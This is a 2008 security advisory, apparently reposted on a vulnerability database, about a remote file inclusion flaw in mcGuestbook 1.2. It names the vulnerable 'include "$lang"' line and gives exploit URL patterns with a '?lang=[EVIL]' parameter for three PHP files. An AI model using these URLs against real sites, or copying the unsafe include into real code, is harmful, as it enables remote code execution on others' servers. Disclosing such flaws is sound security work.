mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

2008.06.28
Credit: Ghost hacker
Risk: High
Local: No
Remote: No
CVE: N/A
CWE: N/A

###################################### mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability ###################################### [~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| [~] HOME : www.Real-Hack.net | )(_o/ \o_)( | [~] Email : Ghost-r00t_at_Hotmail.com |/ /\ \| [~] Script : mcGuestbook 1.2 [~] Download Script : http://www.phpbank.net/admin/download.php?id=155 ############# [ I love the Messenger of Allah Mohammad ] ############# [~] Error ( admin.php + ecrire.php + lire.php ) : include "$lang"; [~] Exploit : http://xxxx/[Path]/ecrire.php?lang=[EVIL] http://xxxx/[Path]/admin.php?lang=[EVIL] http://xxxx/[Path]/lire.php?lang=[EVIL] ############# [ I love the Messenger of Allah Mohammad ] ############# [~] Gootz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB .. Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. All Member Real Hack And All My Friends .. ############################## Real Hack Team ( R-H ) .. ##############################

References:

http://seclists.org/bugtraq/2008/Jun/0203.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top